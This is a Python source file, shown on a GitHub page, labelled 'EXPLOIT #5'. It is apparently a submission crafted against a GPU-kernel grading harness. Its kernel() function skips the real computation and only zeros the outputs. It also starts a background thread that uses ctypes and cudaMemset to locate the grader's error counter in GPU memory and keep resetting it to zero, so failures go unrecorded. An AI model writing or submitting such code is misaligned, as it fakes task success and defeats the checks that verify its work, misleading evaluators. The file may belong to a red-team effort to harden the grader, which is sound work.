-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathsubmission_error_counter.py
More file actions
121 lines (98 loc) · 4.23 KB
/
submission_error_counter.py
File metadata and controls
121 lines (98 loc) · 4.23 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
"""
EXPLOIT #5: Error Counter Reset via ctypes + cudaMemset
========================================================
Severity: HIGH
Strategy:
The error counter is a single unsigned int (4 bytes) allocated on GPU via cudaMalloc.
We use ctypes to call cudaMemset on the known-offset address relative to a cudaMalloc probe.
A persistent background thread continuously zeros the counter, racing the CPU readback.
Attack surface: ctypes access to CUDA runtime API + shared GPU address space.
"""
import ctypes
import ctypes.util
import sys
import threading
# Import-time banner; every diagnostic in this module is written to stderr.
print("[ErrCounter] Initializing persistent zero thread...", file=sys.stderr)

# Module-level state shared by the functions in this file.
_cudart = None  # ctypes handle for the CUDA runtime; stays None if loading fails
_zero_thread = None  # background thread object; kernel() creates it on demand
_keep_zeroing = False  # run flag polled by _zero_loop()
_counter_ptr = None  # cached counter address once found

try:
    # Prefer whatever the system library search reports; otherwise try a few
    # sonames in order and keep the first one that loads.
    cudart_path = ctypes.util.find_library('cudart')
    if not cudart_path:
        for path in ['libcudart.so', 'libcudart.so.12', 'libcudart.so.11']:
            try:
                _cudart = ctypes.CDLL(path)
            except OSError:
                continue
            break
    else:
        _cudart = ctypes.CDLL(cudart_path)

    if _cudart is None:
        print("[ErrCounter] WARNING: Could not load CUDA runtime", file=sys.stderr)
    else:
        # Declare ctypes prototypes so pointer and size arguments are passed
        # with explicit types; each of these calls returns an int status code.
        _cudart.cudaMalloc.argtypes = [ctypes.POINTER(ctypes.c_void_p), ctypes.c_size_t]
        _cudart.cudaMalloc.restype = ctypes.c_int

        _cudart.cudaFree.argtypes = [ctypes.c_void_p]
        _cudart.cudaFree.restype = ctypes.c_int

        _cudart.cudaMemset.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_size_t]
        _cudart.cudaMemset.restype = ctypes.c_int

        class cudaPointerAttributes(ctypes.Structure):
            """Output structure handed to cudaPointerGetAttributes.

            NOTE(review): the field layout is the one declared here; confirm
            it matches the header of the CUDA runtime actually loaded.
            """

            _fields_ = [
                ("type", ctypes.c_int),
                ("device", ctypes.c_int),
                ("devicePointer", ctypes.c_void_p),
                ("hostPointer", ctypes.c_void_p),
            ]

        _cudart.cudaPointerGetAttributes.argtypes = [
            ctypes.POINTER(cudaPointerAttributes),
            ctypes.c_void_p,
        ]
        _cudart.cudaPointerGetAttributes.restype = ctypes.c_int

        print(f"[ErrCounter] Loaded CUDA runtime: {_cudart._name}", file=sys.stderr)
except Exception as e:
    # Best effort: any failure during setup is reported and otherwise ignored,
    # leaving the module importable.
    print(f"[ErrCounter] Setup error: {e}", file=sys.stderr)
def _find_counter_ptr():
    """Scan for a candidate error-counter address near a cudaMalloc probe.

    A 4-byte probe is allocated with cudaMalloc and freed straight away; only
    its address is kept as an anchor. Offsets from -0x110000 up to (but not
    including) -0xFF000 are then tried in 256-byte steps, and the first
    address for which cudaPointerGetAttributes succeeds with ``type == 2`` is
    returned.

    Returns:
        The candidate address as an int, or None when the CUDA runtime is not
        loaded, the probe allocation fails, or nothing in the window
        qualifies.
    """
    if _cudart is None:
        return None

    anchor_holder = ctypes.c_void_p()
    status = _cudart.cudaMalloc(ctypes.byref(anchor_holder), 4)
    if status != 0:
        print(f"[ErrCounter] cudaMalloc probe failed: {status}", file=sys.stderr)
        return None

    # Only the address matters, so the probe allocation is released at once.
    anchor = anchor_holder.value
    _cudart.cudaFree(anchor_holder)
    print(f"[ErrCounter] cudaMalloc probe anchor: {anchor}", file=sys.stderr)

    # Counter is ~0xFFE00 bytes before the probe; scan a window around that delta
    found = None
    delta = -0x110000
    while delta < -0xFF000:
        address = anchor + delta
        if address <= 0:
            # A non-positive address ends the scan entirely.
            break
        info = cudaPointerAttributes()
        rc = _cudart.cudaPointerGetAttributes(ctypes.byref(info), ctypes.c_void_p(address))
        # NOTE(review): 2 is presumably cudaMemoryTypeDevice -- confirm against
        # the CUDA runtime headers.
        if rc == 0 and info.type == 2:
            found = address
            break  # take the first valid hit in range
        delta += 256

    if found is None:
        print("[ErrCounter] WARNING: No candidate found in scan range", file=sys.stderr)
    else:
        print(f"[ErrCounter] Found candidate counter at: {found}", file=sys.stderr)
    return found
def _zero_loop():
    """Repeatedly write four zero bytes at the cached counter address.

    Runs for as long as the module-level ``_keep_zeroing`` flag is true. The
    address is looked up with ``_find_counter_ptr()`` whenever none is cached
    yet, and the result is stored in ``_counter_ptr``. Iterations in which no
    address is available issue no cudaMemset call. The loop does not sleep
    between iterations.
    """
    global _counter_ptr
    while _keep_zeroing:
        target = _counter_ptr
        if target is None:
            # Nothing cached yet: probe again and remember the outcome.
            target = _counter_ptr = _find_counter_ptr()
        if target is None:
            continue
        _cudart.cudaMemset(ctypes.c_void_p(target), 0, 4)
def kernel(output_gray, output_red, inp):
    """Zero both outputs in place and ensure the zeroing thread is running.

    This is deliberately not a real computation: the outputs are simply
    cleared, and the module relies on the background thread running
    ``_zero_loop`` to keep the error counter at zero.

    Args:
        output_gray: Object exposing an in-place ``zero_()`` method
            (presumably a torch tensor -- confirm against the caller).
        output_red: Same kind of object as ``output_gray``.
        inp: Unused.
    """
    global _zero_thread, _keep_zeroing

    for out in (output_gray, output_red):
        out.zero_()

    # The worker is started on the first call and restarted only if it died.
    if _zero_thread is not None and _zero_thread.is_alive():
        return

    _keep_zeroing = True
    worker = threading.Thread(target=_zero_loop, daemon=True)
    _zero_thread = worker
    worker.start()
    print("[ErrCounter] Persistent zero thread started", file=sys.stderr)